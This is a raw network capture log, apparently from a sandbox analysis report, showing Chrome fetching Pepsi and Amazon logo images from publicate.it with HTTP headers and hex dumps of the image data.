                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 33 76 2d 31 2e 35 34 39 68 2d 2e 30 34 63 2d 2e 33 30 36 2e 35 37 2d 2e 37 35 34 2e 39 39 38 2d 31 2e 33 34 35 20 31 2e 33 34 35 2d 2e 35 39 2e 33 34 36 2d 31 2e 32 30 31 2e 35 30 39 2d 31 2e 38 31 32 2e 35 30 39 2d 31 2e 34 34 37 20 30 2d 32 2e 35 30 36 2d 2e 33 34 36 2d 33 2e 31 35 37 2d 31 2e 30 38 2d 2e 36 35 32 2d 2e 37 31 32 2d 2e 39 37 38 2d 31 2e 38 31 32 2d 2e 39 37 38 2d 33 2e 32 35 38 76 2d 37 2e 30 32 37 68 32 2e 34 34 34 76 36 2e 37 38 32 63 30 20 2e 39 37 38 2e 31 38 33 20 31 2e 36 37 2e 35 37 20 32 2e 30 35 37 2e 33 36 37 2e 34 30 38 2e 38 39 36 2e 36 31 31 20 31 2e 35 36 39 2e 36 31 31 2e 35 30 39 20 30 20 2e 39 33 36 2d 2e 30 38 31 20 31 2e 32 38 33 2d 2e 32 34 34 2e 33 34 36 2d 2e 31 36 33 2e 36 33 31 2d 2e 33 36 37 2e 38 33 35 2d 2e 36
                                                                                                                                                                                                        Data Ascii: 3v-1.549h-.04c-.306.57-.754.998-1.345 1.345-.59.346-1.201.509-1.812.509-1.447 0-2.506-.346-3.157-1.08-.652-.712-.978-1.812-.978-3.258v-7.027h2.444v6.782c0 .978.183 1.67.57 2.057.367.408.896.611 1.569.611.509 0 .936-.081 1.283-.244.346-.163.631-.367.835-.6
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 36 39 2e 32 38 35 2d 31 2e 30 31 39 2e 34 38 39 2d 31 2e 35 39 2e 36 33 31 2d 2e 35 39 2e 31 32 32 2d 31 2e 31 36 2e 32 30 34 2d 31 2e 37 33 2e 32 30 34 61 37 2e 32 39 35 20 37 2e 32 39 35 20 30 20 30 20 31 2d 31 2e 39 33 35 2d 2e 32 34 35 20 34 2e 39 32 37 20 34 2e 39 32 37 20 30 20 30 20 31 2d 31 2e 35 34 38 2d 2e 37 31 32 20 33 2e 34 31 39 20 33 2e 34 31 39 20 30 20 30 20 31 2d 31 2e 30 31 38 2d 31 2e 32 30 32 63 2d 2e 32 34 35 2d 2e 34 36 38 2d 2e 33 38 37 2d 31 2e 30 33 39 2d 2e 34 30 38 2d 31 2e 37 31 68 32 2e 34 36 35 76 2e 30 32 68 2e 30 32 7a 6d 38 2e 30 34 35 2d 37 2e 35 31 36 68 31 2e 38 35 33 76 2d 33 2e 33 34 68 32 2e 34 34 34 76 33 2e 33 32 68 32 2e 32 76 31 2e 38 31 33 68 2d 32 2e 32 76 35 2e 39 30 36 63 30 20 2e 32 36 35 2e 30 32 2e 34 36
                                                                                                                                                                                                        Data Ascii: 69.285-1.019.489-1.59.631-.59.122-1.16.204-1.73.204a7.295 7.295 0 0 1-1.935-.245 4.927 4.927 0 0 1-1.548-.712 3.419 3.419 0 0 1-1.018-1.202c-.245-.468-.387-1.039-.408-1.71h2.465v.02h.02zm8.045-7.516h1.853v-3.34h2.444v3.32h2.2v1.813h-2.2v5.906c0 .265.02.46
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 37 34 2e 35 33 2d 31 2e 32 34 32 2e 31 30 31 2d 2e 34 38 39 2e 31 36 32 2d 2e 39 35 37 2e 31 36 32 2d 31 2e 34 34 36 7a 6d 34 2e 32 39 38 2d 39 2e 37 35 36 68 32 2e 34 34 34 76 32 2e 33 30 32 68 2d 32 2e 34 34 34 56 31 30 2e 36 33 7a 6d 30 20 34 2e 32 31 36 68 32 2e 34 34 34 76 31 31 2e 30 36 68 2d 32 2e 34 34 34 76 2d 31 31 2e 30 36 7a 6d 34 2e 36 32 33 2d 34 2e 32 31 36 68 32 2e 34 34 34 76 31 35 2e 32 37 35 48 39 39 2e 34 39 56 31 30 2e 36 33 31 7a 6d 39 2e 38 39 38 20 31 35 2e 35 38 63 2d 2e 38 37 36 20 30 2d 31 2e 36 37 2d 2e 31 34 32 2d 32 2e 33 36 33 2d 2e 34 34 37 61 35 2e 33 36 32 20 35 2e 33 36 32 20 30 20 30 20 31 2d 31 2e 37 35 31 2d 31 2e 32 30 32 20 35 2e 32 33 32 20 35 2e 32 33 32 20 30 20 30 20 31 2d 31 2e 30 38 2d 31 2e 38 35 33 20 37 2e
                                                                                                                                                                                                        Data Ascii: 74.53-1.242.101-.489.162-.957.162-1.446zm4.298-9.756h2.444v2.302h-2.444V10.63zm0 4.216h2.444v11.06h-2.444v-11.06zm4.623-4.216h2.444v15.275H99.49V10.631zm9.898 15.58c-.876 0-1.67-.142-2.363-.447a5.362 5.362 0 0 1-1.751-1.202 5.232 5.232 0 0 1-1.08-1.853 7.
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC243INData Raw: 56 31 36 2e 36 36 68 2d 31 2e 38 35 33 76 2d 31 2e 38 35 33 2e 30 34 7a 4d 32 39 2e 32 36 37 20 31 30 2e 36 33 31 48 31 38 2e 30 38 36 4c 31 34 2e 36 34 34 20 30 20 31 31 2e 31 38 20 31 30 2e 36 33 31 20 30 20 31 30 2e 36 31 31 6c 39 2e 30 34 33 20 36 2e 35 37 38 4c 35 2e 35 38 20 32 37 2e 38 32 31 6c 39 2e 30 34 33 2d 36 2e 35 37 39 20 39 2e 30 34 33 20 36 2e 35 37 39 2d 33 2e 34 34 32 2d 31 30 2e 36 33 32 7a 22 20 66 69 6c 6c 3d 22 23 46 46 46 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 36 42 42 34 45 34 22 20 64 3d 22 6d 32 30 2e 39 39 38 20 31 39 2e 35 39 33 2d 2e 37 37 34 2d 32 2e 34 30 34 2d 35 2e 35 38 20 34 2e 30 35 33 7a 22 2f 3e 0a 20 20 20 20 3c 2f 67 3e 0a 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                        Data Ascii: V16.66h-1.853v-1.853.04zM29.267 10.631H18.086L14.644 0 11.18 10.631 0 10.611l9.043 6.578L5.58 27.821l9.043-6.579 9.043 6.579-3.442-10.632z" fill="#FFF"/> <path fill="#6BB4E4" d="m20.998 19.593-.774-2.404-5.58 4.053z"/> </g></svg>


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        41192.168.2.549789104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC464OUTGET /images/2000px-Pepsi_logo_new.svg.png HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC745INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                        Content-Length: 15225
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "3b79-620aa1d1c8d67"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1GI1A20EywOwaGXVDFMVmbf0ceXAUiLuv%2F9L%2BGydRe1gOE6JO14sFaAxARb0TRwPH8etx3xD30GrB1R602J0Y3GZ0NMaA2AiaE1VzMYXSf9kiP8K3rqgMCE4Oentkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615a84e404240-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC624INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 f6 00 00 00 4c 08 06 00 00 00 5e 43 4a db 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 38 65 58 49 66 4d 4d 00 2a 00 00 00 08 00 01 87 69 00 04 00 00 00 01 00 00 00 1a 00 00 00 00 00 02 a0 02 00 04 00 00 00 01 00 00 00 f6 a0 03 00 04 00 00 00 01 00 00 00 4c 00 00 00 00 84 23 5a ec 00 00 3a ec 49 44 41 54 78 01 ed 5d 09 60 55 d5 b5 dd e7 0e 6f c8 44 02 84 40 08 21 40 90 19 07 70 40 50 e3 0c 2a 20 6a b4 6a 51 81 5a da 6a 5b 6b db ff fb db fe fe b4 fd df af b6 b5 56 db fa ab 22 62 15 2b 29 82 8a 50 1c 83 13 4e c8 3c 87 0c 90 84 21 21 f3 f0 de bb d3 5f fb be 21 ef 85 cc 09 48 f4 1d d8 79 ef dd 7b ee b9 e7 ec 7b d6 d9 fb ec b3 cf be 82 4e 61 b2 2c 4b e0 76 72 80 92 f0 39 11 74 26 e8 0c d0 48
                                                                                                                                                                                                        Data Ascii: PNGIHDRL^CJgAMAa8eXIfMM*iL#Z:IDATx]`UoD@!@p@P* jjQZj[kV"b+)PN<!!_!Hy{{Na,Kvr9t&H
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: ea 79 67 92 34 68 20 49 49 fd 82 e5 20 33 1d 04 3d 0e 5a 09 3a 0c 80 b3 2a 10 4d 51 0e 7c a5 39 d0 2b c0 06 a8 13 c1 25 96 d0 df 05 b1 ca 0d cc 59 64 56 54 91 b1 af 80 9a 5e 7a 8d b4 f5 79 64 1e 85 9d 4b 82 0a ad 02 c8 b2 5f 88 db 79 7b f2 c7 04 c0 35 03 aa bc 41 d2 80 44 72 cc be 92 1c d7 5c 4a ca f8 33 48 1e 02 c5 81 07 0d bf 71 6d 07 3e ff 00 7a 1b e0 2e e3 83 d1 14 e5 c0 57 95 03 3d 06 36 40 cd 73 68 56 b9 59 4a c7 f9 01 5d 49 3a a4 b3 e7 95 37 c9 b7 36 8f ac ca 6a a8 d2 50 93 a5 5e 02 73 5b 4f 03 d2 dc 9e b7 3b 14 52 2f be 80 dc 37 cf 26 05 52 5c 4e 1f 1a bc 82 d5 f1 d5 a0 47 40 db a3 f3 ef 20 5b a2 9f 5f 35 0e 74 1b d8 00 34 2c 57 b6 75 fb 7e 7c b2 a5 1b f3 e7 46 d2 3f df 4e 4d ab d6 92 6f f5 9b 64 55 d7 00 d0 30 7c 9f 6c 40 f3 cd c3 13 5b d3 75 cc
                                                                                                                                                                                                        Data Ascii: yg4h II 3=Z:*MQ|9+%YdVT^zydK_y{5ADr\J3Hqm>z.W=6@shVYJ]I:76jP^s[O;R/7&R\NG@ [_5t4,Wu~|F?NModU0|l@[u
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 65 a0 e7 41 a5 a0 53 9d a4 ac 2c 4b 2a 4f ce 95 bc f5 47 30 10 ef a7 b4 a6 1b 8c bc ac 0d 26 e5 e4 a0 b6 5f 52 ca c9 91 b2 f2 2e 41 bd 36 a0 5e fd 85 33 6e b0 b5 33 09 1a e2 93 df d6 03 52 e4 cb a9 58 2b f5 4a 2e cf 36 f3 f2 7e 0d 5e 9d 4a 7e 59 22 2b 2b 4f 2e 4f 2e b7 9f 1b f3 c7 55 50 65 6d 9a 7d d8 e8 f9 73 13 56 f1 7a 3b fe df d2 b6 98 1c 21 b1 01 6c 5e c7 dd 09 52 f4 c3 c7 a8 76 de dd 64 16 1d 82 f5 e9 04 8d bd ad f2 4e 9f e3 90 d6 32 d6 ad e3 1f ff 35 29 bc f1 a3 93 89 d5 f0 23 95 0d f4 fa 07 c5 76 24 a6 3b af 19 cf 1a 3d ef 00 5b 04 7a 1d 52 fb 64 83 49 50 d6 52 67 6a bc 33 4e 71 78 12 54 cb 39 5c 27 7d 94 b0 a4 01 64 1a 4e e8 58 1e 84 6d 3c 2a 48 2b f4 28 54 3c d0 eb ae 6d 1a 99 d4 98 ff f8 35 f6 dc aa 93 cd ec 56 b6 09 d9 2b 1c 0d 5a 43 8c 64 c8
                                                                                                                                                                                                        Data Ascii: eAS,K*OG0&_R.A6^3n3RX+J.6~^J~Y"++O.O.UPem}sVz;!l^RvdN25)#v$;=[zRdIPRgj3NqxT9\'}dNXm<*H+(T<m5V+ZCd
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 15 6d 2b 29 0a 29 63 33 c9 7d 27 8f 53 dd 4f 28 86 1c 0e 89 f6 16 56 d1 c7 3b a1 b9 60 1e 09 ba 1c 34 9c 7f f4 3c 59 22 75 ee 33 69 0a 59 3f 92 14 f9 71 49 12 e3 fd 9d a2 95 ce 29 10 f0 31 44 78 64 bc f4 d8 b2 0f b2 74 37 34 19 41 24 c6 c1 38 f0 df 06 e9 bf c8 f8 c6 d2 8c ee d4 33 23 7b e9 60 e1 34 bf ab 0a f1 10 02 4d 4e 83 14 42 9f 61 2d b1 c5 40 63 4b 1d d4 8d 03 52 06 ea c7 48 8e 48 dc 81 f9 5d 0e 24 5f 20 6b e2 71 4a 54 66 a6 5c f5 5c 6c 44 9e 4e fe e0 7a 35 68 4d 3f 40 bc bc df c1 a7 e2 5c 80 54 e5 01 24 32 e1 fe 5c 2f 9b fc f5 02 72 22 b3 f0 2f d4 8b 01 01 e9 35 0a 0a d8 12 88 be 9f a4 5d b7 0c 6b a2 b6 73 d6 89 f9 5b 1c 61 7b 83 53 3a 76 93 29 c9 bf 17 42 19 62 99 be c8 86 db bc 51 70 6b b8 73 07 09 12 da d6 b0 5a f0 88 07 40 ae 8f a4 b8 ef 50 4d
                                                                                                                                                                                                        Data Ascii: m+))c3}'SO(V;`4<Y"u3iY?qI)1Dxdt74A$83#{`4MNBa-@cKRHH]$_ kqJTf\\lDNz5hM?@\T$2\/r"/5]ks[a{S:v)BbQpksZ@PM
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: ae 0c d8 b6 b6 5a b2 f9 50 51 a5 b9 9a 3e f8 5e ab f5 6f 6e 78 c7 df b8 61 ec 5e 75 09 3f 48 e3 48 39 69 9f 6d 05 b0 9b 07 a1 8e 8b 38 3d 72 88 f8 78 8a 79 e0 df 48 19 3d a2 c7 15 32 11 46 a9 a2 d6 4b 4d 3e 13 d1 94 20 92 8e d5 53 c9 b1 06 3a 23 3d 89 25 36 76 d7 d8 2f 0f dc db f5 1b e5 48 8a ea 3c 1b dd 38 07 bd 31 52 22 72 61 42 1c 35 4c 63 89 25 99 4b 0e ae 5c 58 d0 5e f9 01 49 f7 39 65 bd bb 25 3d 7e ff 72 cc cf 16 e1 19 2e c0 c0 90 18 92 46 10 ab 48 53 e0 4d 77 b7 a8 b2 d7 e2 df 6f ab 4c 9f b3 72 86 6c d2 dd 18 c9 26 00 2c a1 49 a9 2d 0d 49 ec c1 fc ff 19 af ee 79 09 d6 f6 83 6d 95 11 3c 1e a8 fb a3 a3 e6 3e b3 12 f3 88 9b 10 2d f6 5b 92 a4 c0 86 00 ad 82 c1 23 04 de db 24 ae 12 86 f3 50 ea dc a5 0f 97 bd 42 87 82 d7 b6 fc 4c db 99 36 d2 30 cc 7b 85
                                                                                                                                                                                                        Data Ascii: ZPQ>^onxa^u?HH9im8=rxyH=2FKM> S:#=%6v/H<81R"raB5Lc%K\X^I9e%=~r.FHSMwoLrl&,I-Iym<>-[#$PBL60{
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: a5 5e 69 e0 b8 18 0b 1f c4 f8 00 76 f0 d3 16 52 fb 0d d3 f7 4e bc 2b b1 18 07 fc a8 ea 76 fd 60 9b 4e b4 4a 4d c9 58 89 b1 e3 68 a8 8f b1 ec 13 94 22 4b fa d9 b0 44 47 0c 94 23 b3 57 f4 43 9d 60 5d 17 49 8c 1a ff ad 43 40 7a 53 38 c4 a7 47 df b8 a3 b1 db 55 0a 5c 58 54 55 f0 21 f4 d6 f7 f0 b3 85 c1 ca 52 2d 49 9a 89 75 80 08 60 97 4f 28 6f c4 e4 e6 0b 8c 30 de f0 7b fb 8d 96 22 53 b2 d4 07 87 3b fa cd ef ea 72 5e 78 59 bd f1 9d 81 3d d4 2e 08 0f df 2c 85 23 46 9f 00 36 cf 1d 2d 8a f9 8f 7b c8 79 e9 f4 de e0 83 5d 06 6f d9 64 eb f7 e6 7d e5 30 52 32 18 90 f0 c7 82 c4 e6 1d 5f 8d 5e 0c d2 7e 67 9e fe f8 6c d7 3b 88 33 86 27 d9 72 02 50 d6 64 80 27 02 d8 98 7b 1e 81 31 7b cd a6 0e 0c 3f e1 65 b5 f3 dd aa ed 17 57 85 1b 6c c3 bc b8 18 52 c5 ce 8a f9 28 0b a4
                                                                                                                                                                                                        Data Ascii: ^ivRN+v`NJMXh"KDG#WC`]IC@zS8GU\XTU!R-Iu`O(o0{"S;r^xY=.,#F6-{y]od}0R2_^~gl;3'rPd'{1{?eWlR(
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 3f 1a 63 ed 2d 68 e7 4b f1 7a ec c7 30 ae de 95 98 f5 47 e6 6f af 24 7f 85 b9 1f 47 f6 e5 5e 29 bc 57 0b 81 c0 51 ce 9e 48 f1 7f fa 35 c9 29 f6 ec a1 d7 8a e7 b9 75 69 79 03 ad dd 58 0c 47 94 e6 65 ae de ba 81 bb b1 42 85 4f 75 02 46 ee 08 2e 03 34 b0 27 51 af 8f a8 b2 06 8b ad d4 4a 24 4b 08 64 05 7e 95 b4 b3 43 3f 64 f4 74 96 b6 16 a4 25 03 8b b7 f7 06 3b 68 6b 5c 09 9e e3 cf d6 52 f0 7c cb 73 80 3a b6 38 41 c2 97 60 ba 1a b9 9e 6c 58 2e 68 12 18 5f 22 58 86 da 28 5a 93 06 6f 80 de 4e 12 80 69 83 30 b2 60 61 fa 14 4a 4e 8e 3c 18 fc 05 77 d8 e2 35 77 af 13 86 6f 26 06 fd ff 02 8b f2 31 0e c1 26 c1 a3 23 a7 c8 ba fb 8f f1 df 20 9f a0 11 98 06 c0 ce f3 72 75 49 62 d2 c0 bf 8e c8 5e 32 06 e7 4f 18 48 9a af ed dc 37 2e c0 b6 06 0a 47 d7 a6 8c 9d 2b be 97 72
                                                                                                                                                                                                        Data Ascii: ?c-hKz0Go$G^)WQH5)uiyXGeBOuF.4'QJ$Kd~C?dt%;hk\R|s:8A`lX.h_"X(ZoNi0`aJN<w5wo&1&# ruIb^2OH7.G+r
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 83 c7 df df ac 4a eb e7 92 22 7d 1b 9e 75 88 d3 e6 cf c9 5a 89 a4 ba 63 9d 96 38 3f 51 2d da 5c 4d 84 ff 5d 4f dc 53 0f d8 97 f1 22 46 c6 30 3c d7 56 3b 5f d7 4b ee d6 15 50 d4 e0 b1 27 21 c8 bf e3 e6 39 94 f0 87 5f 9d 34 50 17 94 d5 d2 13 ab 76 50 ee db f9 14 d3 16 a8 ed 36 b0 13 85 44 29 fd 5d c8 67 db 21 18 d8 dc c7 23 24 5f b7 9a 8b 8b a0 1a 0f c6 9f d9 23 af f8 5b cf cd fc 59 39 0a 36 48 66 40 7a ce c0 6e 2a 7b 63 8f 5d 2f 00 1b 46 9d 32 00 76 97 cf 33 90 a7 5e a1 84 fd bf 25 b2 45 58 f3 16 08 de e0 3f cc 3d 1a cb 70 63 14 45 5c 5e 67 d6 a7 f1 a8 10 ba e0 4b fc c2 9d 9e 24 47 32 26 be 17 5a 42 1f e2 57 c7 7b 56 a1 cc ec 67 92 a1 d8 cc 46 c9 11 9e 6f 18 dd 78 71 f3 3d 61 b8 78 6d be d7 13 1c 76 aa dd 72 dd 43 50 41 de 87 a3 4b 84 45 9d 77 c1 c1 96 70
                                                                                                                                                                                                        Data Ascii: J"}uZc8?Q-\M]OS"F0<V;_KP'!9_4PvP6D)]g!#$_#[Y96Hf@zn*{c]/F2v3^%EX?=pcE\^gK$G2&ZBW{VgFoxq=axmvrCPAKEwp
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: e2 56 c1 18 2c 6b 14 5c 64 a1 1d dd 8d 51 39 1b fc c2 ce b1 96 f6 03 9b 67 4f 34 d6 35 ad ae da 78 7f c4 fc 3a 07 4b 6c cf 67 67 8e d5 bd e5 bf 34 24 79 2e 62 7b c7 20 48 21 f3 e7 2c 2c b9 2f c1 e0 f9 fe b0 1b 96 be 6a f9 24 84 8e 2a 3c dc de 72 dc b0 eb 9f bf 4a 27 ed 7e f8 a2 5c 04 b5 3b 42 92 b1 bf 2e a2 e8 bc ed 3d 22 57 a0 de 2c 4c ba 9c 18 d8 9c d6 83 66 db 91 48 ae bc 84 b4 0d 9f c0 12 dc 25 a1 61 17 d2 b9 3f a8 27 e2 89 09 87 42 8e db e6 92 6b fe 8d a4 4e 3d 13 f7 b3 55 c6 ce 15 d1 41 2e 96 b2 bc a7 fa f5 0f 0a 69 fd 67 87 68 77 41 25 1d 47 a8 23 a7 8a 25 d6 2e 0e 80 5c 16 03 7b f0 00 db df 83 ad c3 0c ec 6e af 2f 9e 58 75 ae 50 f0 d9 e1 53 48 83 64 55 bd 1d c1 ee a6 35 f8 1a 36 67 cc 7b ee 73 61 18 3b 10 64 f3 b0 f0 18 4d 8d 31 d8 6f 84 3d dd ba
                                                                                                                                                                                                        Data Ascii: V,k\dQ9gO45x:Klgg4$y.b{ H!,,/j$*<rJ'~\;B.="W,LfH%a?'BkN=UA.ighwA%G#%.\{n/XuPSHdU56g{sa;dM1o=
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 90 b8 ef f3 1b 31 37 6e 3b 42 1f 61 9b e5 9e a2 4a 2a c7 3b ad cb ab 1b f9 ed bf f6 78 e4 8c d8 76 d9 bd 9b f1 ec 6b 6c 7a 12 5d 30 29 85 0b 60 69 fd 16 a8 90 7f f4 52 c2 ee 2e eb 13 cc 81 df 47 08 dd 45 90 32 8b d0 1f 5c 7e 89 c2 30 40 42 a7 b1 b1 ee ff d5 ce 5f 74 50 88 71 74 f1 2a 38 96 fc 53 36 bd 8f a7 d7 9c b1 3b 2f ec 0d 8c ed 5c 1c 71 ea c0 2b b7 1e 42 8c f1 3f 38 0d 3d 1f 6f ba b8 17 1d 94 55 57 d4 23 5c 6b 46 fd f0 5c 79 5b 54 fb 09 57 22 9c 11 f4 c2 7a b4 eb 71 59 55 9e 2f 2c 68 da df 95 e0 83 c1 f2 99 23 98 2e 7e 4e 9a f5 b6 49 da 37 30 82 2d 0a be e7 2c c4 a4 10 bf 3a aa 17 8f 01 90 d2 d0 22 b1 da f4 84 ac e9 7f 2d e4 90 c1 9b 3a 08 b5 84 c0 0c 07 89 3e 44 a4 d3 23 9a e4 fd 14 53 8f fb 31 28 0f f0 0f c4 61 f7 e4 c1 8d 57 0f 03 8f 31 d8 86 d6
                                                                                                                                                                                                        Data Ascii: 17n;BaJ*;xvklz]0)`iR.GE2\~0@B_tPqt*8S6;/\q+B?8=oUW#\kF\y[TW"zqYU/,h#.~NI70-,:"-:>D#S1(aW1


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        42192.168.2.549787104.26.8.2344436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC445OUTGET /images/amazon.svg HTTP/1.1
                                                                                                                                                                                                        Host: publicate.it
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: PHPSESSID=t4fh28r430k6j1mlftlc6k3evl; do-pub-lb="ChAxMC4xMzEuMjM0LjgwOjgwEPu0kQk="
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC758INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:19 GMT
                                                                                                                                                                                                        Content-Type: image/svg+xml
                                                                                                                                                                                                        Content-Length: 5530
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        last-modified: Tue, 27 Aug 2024 13:21:05 GMT
                                                                                                                                                                                                        etag: "159a-620aa1d1d77c8"
                                                                                                                                                                                                        permissions-policy: browsing-topics=()
                                                                                                                                                                                                        cache-control: private
                                                                                                                                                                                                        CF-Cache-Status: BYPASS
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0f9Qm33ZWmK%2BPbaiGczS7xJ0yuivIPV%2FLFhGwHkatWtyqgl%2BXMbCKY%2F5AkWV459fS04qaVR3XgXMNMRFtLsJhAppFSYq5laxqOjjUuLa9p%2FK11bmLncUwK%2BESjjm%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Strict-Transport-Security: max-age=0; includeSubDomains; preload
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb615a86ced7d06-EWR
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC611INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 6e 6f 22 3f 3e 0a 3c 73 76 67 0a 20 20 20 78 6d 6c 6e 73 3a 73 76 67 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 0a 20 20 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 0a 20 20 20 77 69 64 74 68 3d 22 36 30 33 22 0a 20 20 20 68 65 69 67 68 74 3d 22 31 38 32 22 0a 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 23 32 32 31 66 31
                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" width="603" height="182" style="fill:#221f1
                                                                                                                                                                                                        2024-08-30 16:16:19 UTC1369INData Raw: 38 30 30 39 20 35 2e 30 38 36 30 37 2c 38 2e 31 37 39 36 35 22 0a 20 20 20 20 20 69 64 3d 22 70 61 74 68 38 22 0a 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 23 66 66 39 39 30 30 22 20 2f 3e 0a 20 20 3c 70 61 74 68 0a 20 20 20 20 20 64 3d 22 6d 20 33 38 38 2e 35 35 36 37 38 2c 31 32 35 2e 35 33 36 33 35 20 63 20 2d 34 2e 34 35 36 38 38 2c 2d 35 2e 37 31 35 32 37 20 2d 32 39 2e 35 37 32 36 31 2c 2d 32 2e 37 30 30 33 33 20 2d 34 30 2e 38 34 35 38 35 2c 2d 31 2e 33 36 33 32 37 20 2d 33 2e 34 33 34 34 32 2c 30 2e 34 31 39 34 37 20 2d 33 2e 39 35 38 37 34 2c 2d 32 2e 35 36 39 32 35 20 2d 30 2e 38 36 35 31 37 2c 2d 34 2e 37 31 39 30 35 20 32 30 2e 30 30 33 34 36 2c 2d 31 34 2e 30 37 38 34 34 20 35 32 2e 38 32 36 39 36 2c 2d 31 30 2e 30 31 34 38 33 20 35
                                                                                                                                                                                                        Data Ascii: 8009 5.08607,8.17965" id="path8" style="fill:#ff9900" /> <path d="m 388.55678,125.53635 c -4.45688,-5.71527 -29.57261,-2.70033 -40.84585,-1.36327 -3.43442,0.41947 -3.95874,-2.56925 -0.86517,-4.71905 20.00346,-14.07844 52.82696,-10.01483 5
